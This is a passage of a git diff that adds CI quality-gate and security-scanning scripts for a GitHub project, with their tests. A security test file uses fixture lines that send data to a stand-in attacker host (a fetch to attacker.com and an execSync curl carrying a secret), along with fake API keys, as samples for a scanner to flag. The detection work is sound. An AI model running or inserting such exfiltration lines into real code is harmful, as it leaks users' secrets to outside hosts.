+    }
+
+    if (heading === '## Model Used') {
+      const lower = content.toLowerCase();
+      if (MODEL_PLACEHOLDERS.some(p => lower.includes(p.toLowerCase()))) {
+        failures.push(
+          '**Model Used** contains placeholder text — please specify the actual model used (or "None — human-authored")'
+        );
+      }
+    }
+  }
+
+  return { passed: failures.length === 0, failures };
+}
+
+if (process.argv[1] === fileURLToPath(import.meta.url)) {
+  const body = process.env.PR_BODY ?? '';
+  const result = checkTemplate(body);
+  console.log(JSON.stringify(result));
+  process.exit(result.passed ? 0 : 1);
+}
diff --git a/.github/scripts/check-pr-test-coverage.mjs b/.github/scripts/check-pr-test-coverage.mjs
new file mode 100644
index 00000000..27731dd7
--- /dev/null
+++ b/.github/scripts/check-pr-test-coverage.mjs
@@ -0,0 +1,83 @@
+#!/usr/bin/env node
+/**
+ * check-pr-test-coverage.mjs
+ * Checks that a PR diff includes at least one test file. Respects conventional
+ * commit prefixes — skips check for docs/chore/build/ci/style/refactor PRs.
+ * Also detects mismatch: docs/chore PRs that contain real source code changes.
+ * Export: checkTestCoverage(files, prTitle) → { passed, failures }
+ */
+import { fileURLToPath } from 'node:url';
+
+const TEST_PATTERNS = [
+  /\.test\.(ts|js|tsx|jsx)$/,
+  /\.spec\.(ts|js|tsx|jsx)$/,
+  /(?:^|\/)tests?\//,
+  /\/__tests__\//,
+];
+
+const SOURCE_CODE_PATTERN = /\.(ts|tsx|js|jsx|mjs|cjs)$/;
+
+// Prefixes where test coverage is NOT required
+const SKIP_TEST_PREFIXES = ['docs', 'chore', 'build', 'ci', 'style', 'refactor', 'revert'];
+
+// Prefixes where source code changes are NOT expected (mismatch detection)
+// Note: 'style' is excluded — formatting PRs legitimately touch source files
+const NO_SOURCE_CODE_PREFIXES = ['docs', 'chore', 'build', 'ci'];
+
+function parsePrefix(title) {
+  if (!title) return null;
+  const match = title.match(/^([a-z]+)(?:\([^)]*\))?:/);
+  return match ? match[1].toLowerCase() : null;
+}
+
+function isSourceFile(filename) {
+  if (!SOURCE_CODE_PATTERN.test(filename)) return false;
+  if (TEST_PATTERNS.some(p => p.test(filename))) return false;
+  return true;
+}
+
+export function checkTestCoverage(files, prTitle = '') {
+  const prefix = parsePrefix(prTitle);
+
+  // Mismatch detection: docs/chore/etc PR with real source code changes
+  if (prefix && NO_SOURCE_CODE_PREFIXES.includes(prefix)) {
+    const sourceChanges = files.filter(f => f.status !== 'removed' && isSourceFile(f.filename));
+    if (sourceChanges.length > 0) {
+      return {
+        passed: false,
+        failures: [
+          `PR is titled \`${prefix}:\` but includes source code changes ` +
+          `(${sourceChanges.slice(0, 3).map(f => f.filename).join(', ')}` +
+          `${sourceChanges.length > 3 ? ', ...' : ''}). ` +
+          `Please retitle as \`fix:\`, \`feat:\`, or \`refactor:\` so the right gates run, ` +
+          `or remove the source code changes if this is genuinely a \`${prefix}:\` PR.`,
+        ],
+      };
+    }
+  }
+
+  // Skip test requirement for prefixes that don't change behavior
+  if (prefix && SKIP_TEST_PREFIXES.includes(prefix)) {
+    return { passed: true, failures: [] };
+  }
+
+  const hasTests = files.some(
+    f => f.status !== 'removed' && TEST_PATTERNS.some(p => p.test(f.filename))
+  );
+
+  return {
+    passed: hasTests,
+    failures: hasTests ? [] : [
+      'No test files detected in this PR — please include a test that verifies the bug fix or new behavior. ' +
+      'If this PR genuinely doesn\'t need a test (e.g. a refactor), please retitle with `refactor:` prefix.',
+    ],
+  };
+}
+
+if (process.argv[1] === fileURLToPath(import.meta.url)) {
+  const files = JSON.parse(process.env.PR_FILES ?? '[]');
+  const title = process.env.PR_TITLE ?? '';
+  const result = checkTestCoverage(files, title);
+  console.log(JSON.stringify(result));
+  process.exit(result.passed ? 0 : 1);
+}
diff --git a/.github/scripts/fetch-pr-files.mjs b/.github/scripts/fetch-pr-files.mjs
new file mode 100644
index 00000000..b49d1eec
--- /dev/null
+++ b/.github/scripts/fetch-pr-files.mjs
@@ -0,0 +1,21 @@
+#!/usr/bin/env node
+/**
+ * fetch-pr-files.mjs
+ * Fetches the full changed-file list for a PR across GitHub pagination.
+ */
+
+export async function fetchAllPullRequestFiles(ghFetchFn, repo, prNumber, token) {
+  const files = [];
+
+  for (let page = 1; ; page += 1) {
+    const batch = await ghFetchFn(
+      `/repos/${repo}/pulls/${prNumber}/files?per_page=100&page=${page}`,
+      token
+    );
+    files.push(...batch);
+
+    if (batch.length < 100) {
+      return files;
+    }
+  }
+}
diff --git a/.github/scripts/get-bot-token.mjs b/.github/scripts/get-bot-token.mjs
new file mode 100644
index 00000000..7c6ac05c
--- /dev/null
+++ b/.github/scripts/get-bot-token.mjs
@@ -0,0 +1,113 @@
+#!/usr/bin/env node
+/**
+ * get-bot-token.mjs
+ * Generates a short-lived GitHub installation token for the commitperclip app.
+ * Reads COMMITPERCLIP_KEY env var (PEM content of private key).
+ * Prints the token to stdout.
+ *
+ * Also exports: generateJWT(privateKey), ghFetch(path, token, options)
+ * These are used by all other gate scripts.
+ */
+import { createSign } from 'node:crypto';
+import { fileURLToPath } from 'node:url';
+
+const APP_ID = '3718661';
+const OWNER_PATTERN = /^[a-zA-Z0-9_.-]+$/;
+const REPO_PATTERN = /^[a-zA-Z0-9_.-]+\/[a-zA-Z0-9_.-]+$/;
+
+export function generateJWT(privateKey) {
+  const now = Math.floor(Date.now() / 1000);
+  const payload = { iat: now - 10, exp: now + 60, iss: APP_ID };
+  const header = Buffer.from(JSON.stringify({ alg: 'RS256', typ: 'JWT' })).toString('base64url');
+  const body = Buffer.from(JSON.stringify(payload)).toString('base64url');
+  const data = `${header}.${body}`;
+  const sig = createSign('RSA-SHA256').update(data).sign(privateKey, 'base64url');
+  return `${data}.${sig}`;
+}
+
+export async function ghFetch(path, token, options = {}) {
+  const res = await fetch(`https://api.github.com${path}`, {
+    ...options,
+    headers: {
+      Authorization: `Bearer ${token}`,
+      Accept: 'application/vnd.github+json',
+      'X-GitHub-Api-Version': '2022-11-28',
+      ...options.headers,
+    },
+  });
+  const text = await res.text();
+  if (!res.ok) throw new Error(`GitHub API ${options.method ?? 'GET'} ${path} → ${res.status}: ${text}`);
+  return JSON.parse(text);
+}
+
+export async function resolveInstallationId(fetchInstallation, token, repo, owner) {
+  if (repo) {
+    if (!REPO_PATTERN.test(repo)) {
+      throw new Error('ERROR: GH_REPO/GITHUB_REPOSITORY must be in owner/repo format.');
+    }
+
+    const installation = await fetchInstallation(`/repos/${repo}/installation`, token);
+    return installation.id;
+  }
+
+  const installations = await fetchInstallation('/app/installations', token);
+  if (!installations.length) {
+    throw new Error(
+      'ERROR: No installations found for commitperclip. Install URL: https://github.com/apps/commitperclip/installations/new'
+    );
+  }
+
+  if (owner) {
+    if (!OWNER_PATTERN.test(owner)) {
+      throw new Error('ERROR: GITHUB_REPOSITORY_OWNER must be a valid GitHub owner name.');
+    }
+
+    const match = installations.find(
+      installation => installation.account?.login?.toLowerCase() === owner.toLowerCase()
+    );
+
+    if (match) {
+      return match.id;
+    }
+  }
+
+  if (installations.length === 1) {
+    return installations[0].id;
+  }
+
+  throw new Error(
+    'ERROR: Multiple commitperclip installations found. Set GH_REPO or GITHUB_REPOSITORY so the correct installation can be selected.'
+  );
+}
+
+async function main() {
+  const privateKey = process.env.COMMITPERCLIP_KEY;
+  if (!privateKey) {
+    console.error('ERROR: COMMITPERCLIP_KEY env var not set.');
+    console.error('Add to ~/.bash_profile: export COMMITPERCLIP_KEY="$(cat ~/.config/commitperclip/private-key.pem)"');
+    process.exit(1);
+  }
+
+  const jwt = generateJWT(privateKey);
+  const repo = process.env.GH_REPO ?? process.env.GITHUB_REPOSITORY;
+  const owner = process.env.GITHUB_REPOSITORY_OWNER ?? repo?.split('/')[0];
+
+  const installationId = await resolveInstallationId(ghFetch, jwt, repo, owner);
+
+  const { token } = await ghFetch(
+    `/app/installations/${installationId}/access_tokens`,
+    jwt,
+    { method: 'POST', headers: { 'Content-Type': 'application/json' } }
+  );
+
+  if (!token) {
+    console.error('ERROR: Failed to get installation token from GitHub API.');
+    process.exit(1);
+  }
+
+  process.stdout.write(token);
+}
+
+if (process.argv[1] === fileURLToPath(import.meta.url)) {
+  main().catch(e => { console.error(e.message); process.exit(1); });
+}
diff --git a/.github/scripts/run-quality-gates.mjs b/.github/scripts/run-quality-gates.mjs
new file mode 100644
index 00000000..a5b6abae
--- /dev/null
+++ b/.github/scripts/run-quality-gates.mjs
@@ -0,0 +1,145 @@
+#!/usr/bin/env node
+/**
+ * run-quality-gates.mjs
+ * Orchestrates all quality gates. Fetches PR data once, runs all gates,
+ * posts or updates a single consolidated comment via commitperclip.
+ *
+ * Env: GH_TOKEN, GH_REPO, PR_NUMBER, PR_AUTHOR, PR_BRANCH
+ * Exit: 0 if all quality gates pass, 1 if any fail.
+ */
+import { fileURLToPath } from 'node:url';
+import { ghFetch } from './get-bot-token.mjs';
+import { fetchAllPullRequestFiles } from './fetch-pr-files.mjs';
+import { checkTemplate } from './check-pr-template.mjs';
+import { checkLinkedIssue } from './check-pr-linked-issue.mjs';
+import { checkTestCoverage } from './check-pr-test-coverage.mjs';
+import { checkLockfile } from './check-pr-lockfile.mjs';
+import { checkDependencies } from './check-pr-dependencies.mjs';
+
+const COMMENT_SIGNATURE = '— commitperclip';
+
+function buildComment(author, failures, informational) {
+  if (failures.length === 0 && informational.length === 0) {
+    return `✅ All checks passing — ready for Greptile review and maintainer approval.\n\n${COMMENT_SIGNATURE}`;
+  }
+
+  const lines = [
+    `Hey @${author}! Before this PR can be reviewed, a few things need attention:\n`,
+  ];
+
+  if (failures.length > 0) {
+    lines.push('**Missing or incomplete:**');
+    for (const f of failures) lines.push(`- [ ] ${f}`);
+  }
+
+  if (informational.length > 0) {
+    if (failures.length > 0) lines.push('');
+    lines.push('**Informational:**');
+    for (const i of informational) lines.push(`- ${i}`);
+  }
+
+  lines.push(
+    '\nOnce updated, push a new commit and these checks will re-run automatically.\n',
+    COMMENT_SIGNATURE
+  );
+
+  return lines.join('\n');
+}
+
+export async function findExistingComment(fetchFromGitHub, token, repo, prNumber) {
+  for (let page = 1; ; page += 1) {
+    const comments = await fetchFromGitHub(
+      `/repos/${repo}/issues/${prNumber}/comments?per_page=100&page=${page}`,
+      token
+    );
+
+    const existing = comments.find(
+      c => (c.user.login === 'commitperclip[bot]' || c.user.login === 'commitperclip') &&
+           c.body.includes(COMMENT_SIGNATURE)
+    );
+    if (existing) return existing;
+
+    if (comments.length < 100) return null;
+  }
+}
+
+async function upsertComment(token, repo, prNumber, body, existing) {
+  if (existing) {
+    await ghFetch(`/repos/${repo}/issues/comments/${existing.id}`, token, {
+      method: 'PATCH',
+      headers: { 'Content-Type': 'application/json' },
+      body: JSON.stringify({ body }),
+    });
+  } else {
+    await ghFetch(`/repos/${repo}/issues/${prNumber}/comments`, token, {
+      method: 'POST',
+      headers: { 'Content-Type': 'application/json' },
+      body: JSON.stringify({ body }),
+    });
+  }
+}
+
+async function main() {
+  const { GH_TOKEN, GH_REPO, PR_NUMBER, PR_AUTHOR, PR_BRANCH } = process.env;
+
+  if (!GH_TOKEN || !GH_REPO || !PR_NUMBER) {
+    console.error('ERROR: GH_TOKEN, GH_REPO, PR_NUMBER env vars required');
+    process.exit(1);
+  }
+
+  // Sanitize inputs before use in URL construction (prevents SSRF)
+  const prNumber = parseInt(PR_NUMBER, 10);
+  if (!Number.isInteger(prNumber) || prNumber <= 0) {
+    console.error('ERROR: PR_NUMBER must be a positive integer');
+    process.exit(1);
+  }
+  if (!/^[a-zA-Z0-9_.-]+\/[a-zA-Z0-9_.-]+$/.test(GH_REPO)) {
+    console.error('ERROR: GH_REPO must be in owner/repo format');
+    process.exit(1);
+  }
+
+  // Fetch PR data once — gates use this, no redundant API calls
+  const [pr, files] = await Promise.all([
+    ghFetch(`/repos/${GH_REPO}/pulls/${prNumber}`, GH_TOKEN),
+    fetchAllPullRequestFiles(ghFetch, GH_REPO, prNumber, GH_TOKEN),
+  ]);
+
+  const prBody = pr.body ?? '';
+  const author = PR_AUTHOR ?? pr.user.login;
+  const branch = PR_BRANCH ?? pr.head.ref;
+
+  // Run all quality gates (pure functions run sync, deps check is async)
+  const prTitle = pr.title ?? '';
+  const [templateResult, issueResult, testResult, lockfileResult, depsResult] =
+    await Promise.all([
+      Promise.resolve(checkTemplate(prBody)),
+      Promise.resolve(checkLinkedIssue(prBody, prTitle)),
+      Promise.resolve(checkTestCoverage(files, prTitle)),
+      Promise.resolve(checkLockfile(files, author, branch)),
+      checkDependencies(files, GH_TOKEN, GH_REPO, prNumber, pr.base?.ref),
+    ]);
+
+  const allFailures = [
+    ...templateResult.failures,
+    ...issueResult.failures,
+    ...testResult.failures,
+    ...lockfileResult.failures,
+  ];
+  const informational = depsResult.informational ?? [];
+  const allPassed = allFailures.length === 0;
+
+  const commentBody = buildComment(author, allFailures, informational);
+
+  // Post comment if there are failures/informational, or update existing comment
+  const existing = await findExistingComment(ghFetch, GH_TOKEN, GH_REPO, prNumber);
+  if (allFailures.length > 0 || informational.length > 0 || existing) {
+    await upsertComment(GH_TOKEN, GH_REPO, prNumber, commentBody, existing);
+  }
+
+  console.log(JSON.stringify({ passed: allPassed, failures: allFailures, informational }));
+  process.exit(allPassed ? 0 : 1);
+}
+
+if (process.argv[1] === fileURLToPath(import.meta.url)) {
+  main().catch(e => { console.error(e.message); process.exit(1); });
+}
diff --git a/.github/scripts/tests/check-pr-dependencies.test.mjs b/.github/scripts/tests/check-pr-dependencies.test.mjs
new file mode 100644
index 00000000..914e2310
--- /dev/null
+++ b/.github/scripts/tests/check-pr-dependencies.test.mjs
@@ -0,0 +1,65 @@
+import { test } from 'node:test';
+import assert from 'node:assert/strict';
+import { checkDependencies, resolveBaseRef } from '../check-pr-dependencies.mjs';
+
+test('resolveBaseRef: returns the explicit base ref without making API calls', async () => {
+  const baseRef = await resolveBaseRef(async () => {
+    throw new Error('should not fetch');
+  }, 'token', 'paperclipai/paperclip', 6469, 'release/1.2');
+
+  assert.equal(baseRef, 'release/1.2');
+});
+
+test('resolveBaseRef: falls back to the PR base ref', async () => {
+  const seenPaths = [];
+  const baseRef = await resolveBaseRef(async (path) => {
+    seenPaths.push(path);
+    return { base: { ref: 'main' } };
+  }, 'token', 'paperclipai/paperclip', 6469);
+
+  assert.equal(baseRef, 'main');
+  assert.deepEqual(seenPaths, ['/repos/paperclipai/paperclip/pulls/6469']);
+});
+
+test('checkDependencies: compares package files against the resolved base ref instead of master', async () => {
+  const seenPaths = [];
+  const result = await checkDependencies(
+    [{ filename: 'packages/foo/package.json', status: 'modified' }],
+    'token',
+    'paperclipai/paperclip',
+    6469,
+    'release/1.2',
+    async (path) => {
+      seenPaths.push(path);
+
+      if (path.includes('ref=release%2F1.2')) {
+        return {
+          content: Buffer.from(JSON.stringify({
+            dependencies: { existing: '^1.0.0' },
+          })).toString('base64'),
+        };
+      }
+
+      if (path.includes('ref=refs%2Fpull%2F6469%2Fhead')) {
+        return {
+          content: Buffer.from(JSON.stringify({
+            dependencies: {
+              existing: '^1.0.0',
+              added: '^2.0.0',
+            },
+          })).toString('base64'),
+        };
+      }
+
+      throw new Error(`Unexpected path: ${path}`);
+    }
+  );
+
+  assert.equal(result.passed, true);
+  assert.equal(result.informational.length, 1);
+  assert.match(result.informational[0], /`added`/);
+  assert.deepEqual(seenPaths, [
+    '/repos/paperclipai/paperclip/contents/packages/foo/package.json?ref=release%2F1.2',
+    '/repos/paperclipai/paperclip/contents/packages/foo/package.json?ref=refs%2Fpull%2F6469%2Fhead',
+  ]);
+});
diff --git a/.github/scripts/tests/check-pr-linked-issue.test.mjs b/.github/scripts/tests/check-pr-linked-issue.test.mjs
new file mode 100644
index 00000000..6b2745db
--- /dev/null
+++ b/.github/scripts/tests/check-pr-linked-issue.test.mjs
@@ -0,0 +1,111 @@
+import { test } from 'node:test';
+import assert from 'node:assert/strict';
+import { checkLinkedIssue } from '../check-pr-linked-issue.mjs';
+
+// Existing tests with title parameter added (defaults to no prefix, so still required)
+
+test('passes with bare #NNN reference', () => {
+  assert.equal(checkLinkedIssue('This fixes the bug in #123', 'fix: something').passed, true);
+});
+
+test('passes with "Fixes #NNN"', () => {
+  assert.equal(checkLinkedIssue('Fixes #456\n\nSome description', 'fix: something').passed, true);
+});
+
+test('passes with "Closes #NNN" (case-insensitive)', () => {
+  assert.equal(checkLinkedIssue('closes #789', 'fix: something').passed, true);
+});
+
+test('passes with "Resolves #NNN"', () => {
+  assert.equal(checkLinkedIssue('Resolves #101', 'fix: something').passed, true);
+});
+
+test('passes with full github.com URL', () => {
+  assert.equal(
+    checkLinkedIssue('See https://github.com/paperclipai/paperclip/issues/202', 'fix: bug').passed,
+    true
+  );
+});
+
+test('passes with a full github.com URL followed by punctuation', () => {
+  assert.equal(
+    checkLinkedIssue('See (https://github.com/paperclipai/paperclip/issues/202).', 'fix: bug').passed,
+    true
+  );
+});
+
+test('fails with empty body when no skip prefix', () => {
+  const result = checkLinkedIssue('', 'fix: bug');
+  assert.equal(result.passed, false);
+  assert.ok(result.failures.length > 0);
+});
+
+test('fails with no issue reference when no skip prefix', () => {
+  const result = checkLinkedIssue('Added a cool feature, no issue linked', 'feat: something');
+  assert.equal(result.passed, false);
+  assert.ok(result.failures[0].includes('Fixes #NNN'));
+});
+
+test('fails with cross-repo issue reference', () => {
+  const result = checkLinkedIssue('See https://github.com/other/repo/issues/123', 'fix: bug');
+  assert.equal(result.passed, false);
+});
+
+test('fails when the Paperclip issue URL is embedded inside another host', () => {
+  const result = checkLinkedIssue(
+    'See https://evil.example/https://github.com/paperclipai/paperclip/issues/123',
+    'fix: bug'
+  );
+  assert.equal(result.passed, false);
+});
+
+test('fails when the Paperclip issue URL continues into another host', () => {
+  const result = checkLinkedIssue(
+    'See https://github.com/paperclipai/paperclip/issues/123.evil.example',
+    'fix: bug'
+  );
+  assert.equal(result.passed, false);
+});
+
+test('fails when #NNN is part of a word (no space before)', () => {
+  const result = checkLinkedIssue('This is version#123 not an issue link', 'fix: bug');
+  assert.equal(result.passed, false);
+});
+
+// New tests for prefix-aware skip behavior
+
+test('skips check for docs: prefix', () => {
+  assert.equal(checkLinkedIssue('', 'docs: update README').passed, true);
+});
+
+test('skips check for chore: prefix', () => {
+  assert.equal(checkLinkedIssue('', 'chore: bump deps').passed, true);
+});
+
+test('skips check for build: prefix', () => {
+  assert.equal(checkLinkedIssue('', 'build: update Dockerfile').passed, true);
+});
+
+test('skips check for ci: prefix', () => {
+  assert.equal(checkLinkedIssue('', 'ci: add workflow').passed, true);
+});
+
+test('skips check for test: prefix', () => {
+  assert.equal(checkLinkedIssue('', 'test: add coverage').passed, true);
+});
+
+test('skips check with scoped prefix like docs(api):', () => {
+  assert.equal(checkLinkedIssue('', 'docs(api): document endpoint').passed, true);
+});
+
+test('requires issue for feat: prefix', () => {
+  assert.equal(checkLinkedIssue('Some description without issue', 'feat: new thing').passed, false);
+});
+
+test('requires issue for refactor: prefix', () => {
+  assert.equal(checkLinkedIssue('Some refactor', 'refactor: rewrite thing').passed, false);
+});
+
+test('requires issue when no prefix (encourages prefix usage)', () => {
+  assert.equal(checkLinkedIssue('No prefix here', 'Add some feature').passed, false);
+});
diff --git a/.github/scripts/tests/check-pr-lockfile.test.mjs b/.github/scripts/tests/check-pr-lockfile.test.mjs
new file mode 100644
index 00000000..03d897f2
--- /dev/null
+++ b/.github/scripts/tests/check-pr-lockfile.test.mjs
@@ -0,0 +1,33 @@
+import { test } from 'node:test';
+import assert from 'node:assert/strict';
+import { checkLockfile } from '../check-pr-lockfile.mjs';
+
+const makeFiles = (filenames) => filenames.map(f => ({ filename: f, status: 'modified' }));
+
+test('passes when lockfile is not changed', () => {
+  assert.equal(checkLockfile(makeFiles(['src/foo.ts']), 'someuser', 'fix/bug').passed, true);
+});
+
+test('passes when lockfile changed by refresh bot on correct branch', () => {
+  const result = checkLockfile(
+    makeFiles(['pnpm-lock.yaml']),
+    'github-actions[bot]',
+    'chore/refresh-lockfile'
+  );
+  assert.equal(result.passed, true);
+});
+
+test('fails when lockfile changed by regular user', () => {
+  const result = checkLockfile(makeFiles(['pnpm-lock.yaml']), 'someuser', 'fix/bug');
+  assert.equal(result.passed, false);
+  assert.ok(result.failures[0].includes('pnpm-lock.yaml'));
+});
+
+test('fails when lockfile changed by bot on wrong branch', () => {
+  const result = checkLockfile(
+    makeFiles(['pnpm-lock.yaml']),
+    'github-actions[bot]',
+    'fix/something-else'
+  );
+  assert.equal(result.passed, false);
+});
diff --git a/.github/scripts/tests/check-pr-security.test.mjs b/.github/scripts/tests/check-pr-security.test.mjs
new file mode 100644
index 00000000..d1283333
--- /dev/null
+++ b/.github/scripts/tests/check-pr-security.test.mjs
@@ -0,0 +1,316 @@
+import { test } from 'node:test';
+import assert from 'node:assert/strict';
+import {
+  buildAdvisoryPayload,
+  findExistingDraftAdvisory,
+  postSecurityCheckRun,
+  scanSecrets,
+  scanCITampering,
+  scanBuildScripts,
+  scanSupplyChain,
+  scanTestPatterns,
+  scanSensitivePaths,
+  syncDraftAdvisory,
+  validateSensitivePaths,
+} from '../check-pr-security.mjs';
+
+// ── scanSecrets ──────────────────────────────────────────────────────────────
+
+test('scanSecrets: flags OpenAI key in added line', () => {
+  const files = [{ filename: 'src/config.ts', patch: '+const key = "sk-abcdefghijklmnopqrstuvwxyz123456"' }];
+  assert.ok(scanSecrets(files).length > 0);
+});
+
+test('scanSecrets: flags AWS key in added line', () => {
+  const files = [{ filename: 'src/config.ts', patch: '+const awsKey = "AKIAIOSFODNN7EXAMPLE"' }];
+  assert.ok(scanSecrets(files).length > 0);
+});
+
+test('scanSecrets: ignores removed lines', () => {
+  const files = [{ filename: 'src/config.ts', patch: '-const key = "sk-abcdefghijklmnopqrstuvwxyz123456"' }];
+  assert.equal(scanSecrets(files).length, 0);
+});
+
+test('scanSecrets: ignores files without patch', () => {
+  assert.equal(scanSecrets([{ filename: 'large-file.ts' }]).length, 0);
+});
+
+// ── scanCITampering ──────────────────────────────────────────────────────────
+
+test('scanCITampering: flags workflow file changes', () => {
+  const files = [{ filename: '.github/workflows/pr.yml', status: 'modified' }];
+  assert.ok(scanCITampering(files).length > 0);
+});
+
+test('scanCITampering: ignores non-workflow files', () => {
+  const files = [{ filename: 'src/foo.ts', status: 'modified' }];
+  assert.equal(scanCITampering(files).length, 0);
+});
+
+test('scanCITampering: ignores removed workflow files', () => {
+  const files = [{ filename: '.github/workflows/old.yml', status: 'removed' }];
+  assert.equal(scanCITampering(files).length, 0);
+});
+
+// ── scanBuildScripts ─────────────────────────────────────────────────────────
+
+test('scanBuildScripts: flags changes to release.sh', () => {
+  const files = [{ filename: 'scripts/release.sh', status: 'modified' }];
+  assert.ok(scanBuildScripts(files).length > 0);
+});
+
+test('scanBuildScripts: ignores non-CI scripts', () => {
+  const files = [{ filename: 'scripts/generate-org-chart-images.ts', status: 'modified' }];
+  assert.equal(scanBuildScripts(files).length, 0);
+});
+
+// ── scanSupplyChain ──────────────────────────────────────────────────────────
+
+test('scanSupplyChain: flags net-new packages in lockfile', () => {
+  const patch = `@@ -1,3 +1,4 @@
+ packages:
++  'evil-package@1.0.0':
+   'existing-package@2.0.0':
+-  'old-package@1.0.0':
+`;
+  const files = [{ filename: 'pnpm-lock.yaml', patch }];
+  const flags = scanSupplyChain(files);
+  assert.ok(flags.length > 0);
+  assert.ok(flags[0].packages.includes('evil-package'));
+});
+
+test('scanSupplyChain: does not flag version-only bumps', () => {
+  const patch = `@@ -1,3 +1,3 @@
+ packages:
+-  'existing-package@1.0.0':
++  'existing-package@2.0.0':
+`;
+  const files = [{ filename: 'pnpm-lock.yaml', patch }];
+  assert.equal(scanSupplyChain(files).length, 0);
+});
+
+test('scanSupplyChain: flags pnpm v9-style unquoted package entries', () => {
+  const patch = `@@ -1,2 +1,3 @@
++evil-package@1.0.0:
+ existing-package@2.0.0:
+`;
+  const files = [{ filename: 'pnpm-lock.yaml', patch }];
+  const flags = scanSupplyChain(files);
+  assert.deepEqual(flags, [{ check: 'supply-chain', packages: ['evil-package'] }]);
+});
+
+test('scanSupplyChain: ignores peer suffixes when matching package names', () => {
+  const patch = `@@ -1,2 +1,2 @@
+-@scope/pkg@1.0.0(react@18.2.0):
++@scope/pkg@2.0.0(react@18.2.0):
+`;
+  const files = [{ filename: 'pnpm-lock.yaml', patch }];
+  assert.equal(scanSupplyChain(files).length, 0);
+});
+
+test('scanSupplyChain: flags net-new packages that include pnpm peer suffixes', () => {
+  const patch = `@@ -1,2 +1,3 @@
++evil-package@1.0.0(react@18.2.0):
+ existing-package@2.0.0:
+`;
+  const files = [{ filename: 'pnpm-lock.yaml', patch }];
+  const flags = scanSupplyChain(files);
+  assert.deepEqual(flags, [{ check: 'supply-chain', packages: ['evil-package'] }]);
+});
+
+test('findExistingDraftAdvisory: returns matching draft advisory from paginated results', async () => {
+  const calls = [];
+  const fakeFetch = async (path) => {
+    calls.push(path);
+    if (/[?&]page=1(?:&|$)/.test(path)) {
+      return Array.from({ length: 100 }, (_, i) => ({ summary: `Unrelated advisory ${i}` }));
+    }
+    if (/[?&]page=2(?:&|$)/.test(path)) {
+      return [{ summary: '🚨 Security flag — PR #6469: ci-tampering' }];
+    }
+    return [];
+  };
+
+  const advisory = await findExistingDraftAdvisory(fakeFetch, 'token', 'paperclipai/paperclip', 6469);
+
+  assert.deepEqual(advisory, { summary: '🚨 Security flag — PR #6469: ci-tampering' });
+  assert.equal(calls.length, 2);
+});
+
+test('findExistingDraftAdvisory: returns null when no matching draft advisory exists', async () => {
+  const fakeFetch = async () => [{ summary: 'Completely different advisory' }];
+  const advisory = await findExistingDraftAdvisory(fakeFetch, 'token', 'paperclipai/paperclip', 6469);
+  assert.equal(advisory, null);
+});
+
+test('syncDraftAdvisory: patches an existing advisory with the latest flags', async () => {
+  const calls = [];
+  const flags = [
+    { check: 'ci-tampering', file: '.github/workflows/pr.yml' },
+    { check: 'secret-scan', file: 'src/config.ts', pattern: 'OpenAI API key' },
+  ];
+
+  await syncDraftAdvisory(async (path, token, options) => {
+    calls.push({ path, token, options });
+    if (path.includes('/security-advisories?state=draft')) {
+      return [{ ghsa_id: 'GHSA-test-1234', summary: '🚨 Security flag — PR #6469: ci-tampering' }];
+    }
+    return { ok: true };
+  }, 'token', 'paperclipai/paperclip', 6469, 'My PR', flags);
+
+  assert.equal(calls.length, 2);
+  assert.equal(calls[1].path, '/repos/paperclipai/paperclip/security-advisories/GHSA-test-1234');
+  assert.equal(calls[1].options.method, 'PATCH');
+  assert.deepEqual(JSON.parse(calls[1].options.body), buildAdvisoryPayload(6469, 'My PR', flags));
+});
+
+test('syncDraftAdvisory: creates a new advisory when none exists', async () => {
+  const calls = [];
+  const flags = [{ check: 'supply-chain', packages: ['evil-package'] }];
+
+  await syncDraftAdvisory(async (path, token, options) => {
+    calls.push({ path, token, options });
+    if (path.includes('/security-advisories?state=draft')) {
+      return [];
+    }
+    return { ok: true };
+  }, 'token', 'paperclipai/paperclip', 6469, 'My PR', flags);
+
+  assert.equal(calls.length, 2);
+  assert.equal(calls[1].path, '/repos/paperclipai/paperclip/security-advisories');
+  assert.equal(calls[1].options.method, 'POST');
+  assert.deepEqual(JSON.parse(calls[1].options.body), buildAdvisoryPayload(6469, 'My PR', flags));
+});
+
+test('postSecurityCheckRun: uses the injected fetch implementation', async () => {
+  const calls = [];
+
+  await postSecurityCheckRun(async (path, token, options) => {
+    calls.push({ path, token, options });
+    return { ok: true };
+  }, 'token', 'paperclipai/paperclip', 'deadbeef', true);
+
+  assert.equal(calls.length, 1);
+  assert.equal(calls[0].path, '/repos/paperclipai/paperclip/check-runs');
+  assert.equal(calls[0].options.method, 'POST');
+  assert.deepEqual(JSON.parse(calls[0].options.body), {
+    name: 'security-review',
+    head_sha: 'deadbeef',
+    status: 'in_progress',
+    output: {
+      title: 'Security Review Pending',
+      summary: 'This PR has been flagged for manual security review by a maintainer. No action needed from you.',
+    },
+  });
+});
+
+test('validateSensitivePaths: checks paths against the resolved base ref instead of master', async () => {
+  const seenPaths = [];
+  const stale = await validateSensitivePaths(
+    'token',
+    'paperclipai/paperclip',
+    6469,
+    'release/1.2',
+    async (path) => {
+      seenPaths.push(path);
+      return { ok: true };
+    },
+  );
+
+  assert.deepEqual(stale, []);
+  assert.ok(seenPaths.every(path => path.includes('ref=release%2F1.2')));
+  assert.ok(!seenPaths.some(path => path.includes('ref=master')));
+});
+
+test('validateSensitivePaths: returns only 404 paths and rethrows non-404 errors', async () => {
+  let seen404 = false;
+  const stale = await validateSensitivePaths(
+    'token',
+    'paperclipai/paperclip',
+    6469,
+    'main',
+    async (path) => {
+      if (!seen404) {
+        seen404 = true;
+        throw new Error('GitHub API GET /contents/foo → 404: missing');
+      }
+      return { ok: true };
+    },
+  );
+
+  assert.equal(stale.length, 1);
+
+  await assert.rejects(
+    validateSensitivePaths(
+      'token',
+      'paperclipai/paperclip',
+      6469,
+      'main',
+      async () => {
+        throw new Error('GitHub API GET /contents/foo → 500: boom');
+      },
+    ),
+    /500: boom/
+  );
+});
+
+// ── scanTestPatterns ─────────────────────────────────────────────────────────
+
+test('scanTestPatterns: flags outbound fetch in test file', () => {
+  const files = [{
+    filename: 'src/foo.test.ts',
+    patch: `+  const res = await fetch('https://attacker.com/collect')`,
+  }];
+  assert.ok(scanTestPatterns(files).length > 0);
+});
+
+test('scanTestPatterns: flags execSync in test file', () => {
+  const files = [{
+    filename: 'src/foo.test.ts',
+    patch: `+  execSync('curl https://attacker.com?data=' + secret)`,
+  }];
+  assert.ok(scanTestPatterns(files).length > 0);
+});
+
+test('scanTestPatterns: ignores suspicious patterns in non-test files', () => {
+  const files = [{
+    filename: 'src/api.ts',
